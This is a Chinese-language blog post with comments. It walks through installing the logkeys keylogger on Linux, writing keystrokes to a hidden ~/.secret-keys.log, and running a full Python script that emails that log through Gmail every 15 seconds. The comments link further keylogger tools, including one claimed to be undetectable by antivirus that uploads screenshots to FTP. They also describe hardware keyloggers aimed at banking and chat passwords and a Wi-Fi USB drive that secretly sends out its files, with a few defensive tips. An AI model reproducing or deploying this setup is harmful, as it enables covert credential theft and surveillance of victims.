logkeys的下载地址:http://code.google.com/p/logkeys/
安装:
tar zxvf logkeys-0.1.0.tar.gz cd logkeys-0.1.0/ ./configure make make install #卸载就是:make uninstall
然后:
cp logkeys /bin
使用选项说明:
root@kali:~/Desktop/temp/logkeys-0.1.1a/src# ./logkeys Usage: logkeys [OPTION]... Log depressed keyboard keys. -s, --start start logging keypresses -m, --keymap=FILE use keymap FILE -o, --output=FILE log output to FILE [/var/log/logkeys.log] -u, --us-keymap use en_US keymap instead of configured default -k, --kill kill running logkeys process -d, --device=FILE input event device [eventX from /dev/input/] -?, --help print this help screen --export-keymap=FILE export configured keymap to FILE and exit --no-func-keys log only character keys --no-timestamps don't prepend timestamps to log file lines --post-http=URL POST log to URL as multipart/form-data file --post-size=SIZE post log file when size equals SIZE [500k] Examples: logkeys -s -m mylang.map -o ~/.secret-keys.log logkeys -s -d event6 logkeys -k logkeys version: 0.1.1a logkeys homepage: <http://code.google.com/p/logkeys/>
定时发送邮件的Python脚本:
#!/usr/bin/env python
#coding=utf-8
import smtplib
from email.Message import Message
import time
import optparse
import sched
schedular=sched.scheduler(time.time, time.sleep)
def sendMail(emailTo, thePasswd):
systemTime=time.strftime('%Y-%m-%d-%T',time.localtime(time.time()))
try:
fileObj=open("/root/.secret-keys.log", "r") #"/root/.secret-keys.log"是键盘记录的输出文件,根据输出文件的位置不同自己需要进行适当的修改
content=fileObj.read()
except:
print "Cannot read filen"
exit()
message = Message()
message['Subject'] = 'Log Keys' #邮件标题
message['From'] = "[email protected]"
message['To'] = emailTo
message.set_payload("当前时间"+systemTime+"n"+content) #邮件正文
msg = message.as_string()
smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20)
#sm.set_debuglevel(1) #开启debug模式
smtp.starttls() #使用安全连接
smtp.login(emailTo, thePasswd)
smtp.sendmail("[email protected]", emailTo, msg)
time.sleep(5) #避免邮件没有发送完成就调用了quit()
smtp.quit()
def perform(inc, emailTo, thePasswd):
schedular.enter(inc, 0, perform, (inc, emailTo, thePasswd))
sendMail(emailTo, thePasswd)
def myMain(inc, emailTo, thePasswd):
schedular.enter(0, 0, perform, (inc, emailTo, thePasswd))
schedular.run()
if __name__=="__main__":
optObj=optparse.OptionParser()
optObj.add_option("-u", dest="user", help="Gmail account")
optObj.add_option("-p", dest="passwd", help="Gmail Passwd")
(options, args)=optObj.parse_args()
emailName=options.user
emailPasswd=options.passwd
myMain(15, emailName, emailPasswd) #15表示的是相隔时间,可以根据自己的需求设定
在网上看到的内容,但时间就了,就忘了出处,搜索也没找到,如果有知道的请告知,谢谢。
《 “记录键盘敲击记录 && 定时发送邮件” 》 有 7 条评论
一个适用于Windows/Linux/Mac的简单键盘记录器
https://github.com/GiacomoLaw/Keylogger
C++ Keylogger for windows 7. Works with DLL injection on explorer.exe
https://github.com/ferrery1/Keylogger
macOS – keylogging through HID device interface
https://theevilbit.blogspot.com/2019/02/macos-keylogging-through-hid-device.html
https://github.com/theevilbit/macos/tree/master/USBKeyLog
https://github.com/SkrewEverything/Swift-Keylogger
https://medium.com/from-the-scratch/hacking-one-of-its-kind-keylogger-for-macos-no-permissions-needed-to-run-684ff32025f5
近源渗透测试之Keylogger实战
https://mp.weixin.qq.com/s/ra_N5dkhZOcHmdHuzl-oQw
`
说起键盘记录,很多人第一反应肯定是各种病毒木马软件,然后现在的电脑安装了各种防护软件,很容易就被杀毒软件查杀了。那么有没有一款键盘记录器永远都不会被杀毒软件查杀,可以绕过各种防护记录支付宝、网上银行、QQ、邮箱的账号密码呢?
答案是肯定的!那就是硬件键盘记录器。
Keylogger是keelog公司出品的一系列硬件键盘记录器。它通过串联键盘和主机,记录受害者的所有键盘记录,因为是一款硬件设备,所以它并不会被任何杀毒软件拦截。并且体型小巧,如果不仔细查看,很难被发现。
他外形小巧,但是功能强大。目前有AirDrive Keylogger、AirDrive Forensic Keylogger、KeyGrabber Forensic Keylogger等多个版本,并且每个版本还有基本款、PRO款、MAX款等。除了最基本的键盘记录功能以外,还有接入无线网络、释放无线热点、记录时间戳、电子邮件发送报告等强大功能,甚至在KeyGrabber Forensic Keylogger的PRO和MAX版本中,还具备HID脚本编写的功能,化身BadUSB。
keelog除了键盘记录器以外,还有生产了支持DVI, VGA, HDMI类型的显示器记录器等取证产品。
为防止类似事件发生:
1.使用公共场所的电脑,一定要注意观察,尽量减少输入账号密码等敏感操作。
2.如果确实需要输入密码,可以采用鼠标点击软键盘输入账号密码、第三方扫描登录等方式。
3.公司办公区域、个人台式主机不要轻易让陌生人靠近、接触。
`
Input Capture: Keylogging
https://attack.mitre.org/techniques/T1056/001/
`
Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when OS Credential Dumping efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.[1] Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike Credential API Hooking, this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* Modify System Image may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.[2]
攻击者可能会记录用户的键盘敲击,以便在用户键入凭证时获取凭证。尤其是当操作系统凭据转储工作无效时,键盘记录是一个获取凭证以拿到新的访问权限的机会,但可能需要攻击者在成功捕获凭据之前很长一段时间内都记录系统上的击键。
键盘记录是最普遍的输入捕获类型,有许多不同的方式获取击键,比如:
* hook住用于处理击键的API回调。与凭据API hook不同,它只关注用于处理击键数据的API函数。
* 从硬件缓冲区读取原始击键数据。
* 修改Windows注册表。
* 自定义驱动。
* 修改系统映像可以为攻击者提供进入操作系统网络设备的钩子,以读取登录会话的原始击键。
`
针对U盘文件的盗与防攻略
https://mp.weixin.qq.com/s/LcgSc2lNBS6iQgHO88vmKg
`
近年来,使用U盘作为介质完成的网络攻击屡见不鲜。
* 2010年的震网病毒事件,使用了基于U盘来触发的windows 快捷方式漏洞;
* 2014年安全研究员在BlackHat上公布了基于U盘的BadUsb攻击,该攻击也基于U盘这个介质;
* 2021年,在BlackHat Europe上,安全研究员利用USB协议栈的Double Free漏洞控制了linux 系统,这个攻击同样也基于U盘触发。
以上几种方法都是通过USB设备获得了主机控制权限,本文介绍一种在不获取主机控制权限条件下对U盘文件进行读取的方法。该方法需要一个特制的U盘,在使用这个U盘进行文件的存储、拷贝过程中,可在用户不知情的情况下将U盘里的文件发送给远端的接收者。
# 原理
一个U盘主要由主控板(USB控制器)、FLASH存储等组成。FLASH分为2部分,一部分是用户可见的存储区,另一部分是用户不可见的固件区域。
当U盘插入电脑后,固件区域的代码便开始运行,固件区域的代码主要为USB协议栈代码,这些代码用来响应主机端(HOST端)发起的各种请求,请求包括查看设备信息、设备容量、读写文件等。U盘接入电脑后,电脑主机会向U盘发起一些请求,U盘的固件代码会对这些请求做出响应。
当主机端向设备端发起请求时,一个“诚实”的U盘(设备端固件)会如实地回答自己的设备信息及其状态,例如,设备名字、设备类型(存储设备,键盘鼠标设备)、设备容量等,而一个“不诚实”的U盘会伪造这些内容来欺骗主机端。用于HID攻击,BADUSB攻击的U盘便属于”不诚实”的U盘,它们在响应主机的请求时,都欺骗了主机设备,把自己伪造成了键鼠设备,在获取主机的信任后,通过执行任意键鼠操作来完成一些恶意操作。
为了达到将U盘的内容发送到远程接收端的目的,需要修改U盘控制器的固件代码,在固件代码中添加文件传输的功能。除此之外,还需要一个支持无线通信功能的U盘控制器,该控制器同时支持WIFI功能和USB功能,通过控制器的WIFI功能,U盘能够连接周围的热点,并且将存储在FLASH中的文件内容发送到文件接收端。
为了实现这个功能,笔者选取了同时支持WIFI和USB功能的芯片作为控制器芯片,芯片同时支持向芯片刷入自定义固件。基于该芯片的开发板更便于开发U盘相关的应用,例如开发制作USB HID设备、USB存储设备等。
想要制作一个具有联网功能并且外观像普通U盘的USB设备,只需通过PCB画板进行硬件设计,把芯片设计到U盘里,一个“不诚实”的U盘便诞生了。
# 防护手法
对于普通用户来说,想要防范此类攻击需要提高个人安全意识。不要随便使用不明来源的U盘,也不要轻易接受并使用他人赠送的U盘。尽量从正规渠道购买,切忌从不可信的第三方渠道/二手市场购买U盘。
除此之外,我们在插入使用新U盘时,可以留意下周围是否有新增可疑WIFI热点,如果没有新增可疑WIFI热点,那么基本上可以确定我们并没有受到此类型攻击。
`
Keylogger is 100% invisible keylogger not only for users, but also undetectable by antivirus software. Blackcat keylogger Monitors all keystokes, Mouse clicks. It has a seperate process which continues capture system screenshot and send to ftp server in given time.
https://github.com/ajayrandhawa/Keylogger